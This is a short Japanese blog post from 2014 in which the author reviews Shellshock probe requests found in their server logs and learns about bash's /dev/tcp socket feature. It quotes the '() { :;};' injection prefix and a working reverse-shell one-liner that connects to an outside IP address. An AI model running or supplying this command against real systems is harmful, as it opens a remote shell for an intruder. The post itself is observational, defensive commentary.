2014-09-26

/dev/tcpによるbashのソケット通信

件のbashの脆弱性が残っていることを期待したアクセスについて、24時間ほど前には来てなかったんですが、さきほどログを見てみたらちょっとだけ来てました。

ログに残るのは User-Agent ぐらいなのですが、ほかのフィールドで試している輩もいることでしょう。

アクセス元を逆引きしてみたんですが、クラウドサービスばっかりでした(一個だけ shodan.io なるドメインの下のIPアドレスからあったのだけど、なんだろう……)。

さて、() { :;}; の後になにをやってるのか、というのなんですが、一つ THIS IS VULNERABLE と echo するだけという人がいました。警告のつもりなのか、手動で何か確認しているのかな。あとはpingだな……と思ってたんですが、ちょっと特異なものが。
/bin/bash -i > /dev/tcp/198.206.15.239/8081 0>&1
えっ/dev/tcp ってなにそれ、と思ったんですが、Bashの独自拡張で、このパス名を使ってソケット通信する機能があるんですね。全然、まったく、知らなかった。ファイルシステムとかFUSEのようなレイヤじゃなくてシェルでそんなことやるわけ? まじで……。

今回の脆弱性が発見されるまで変数定義で関数定義できるという機能も知りませんでしたし、bashって思ったよりヤバいやつだなと思いました。/bin/shに使うようなものではないかな……。

No comments:

Post a Comment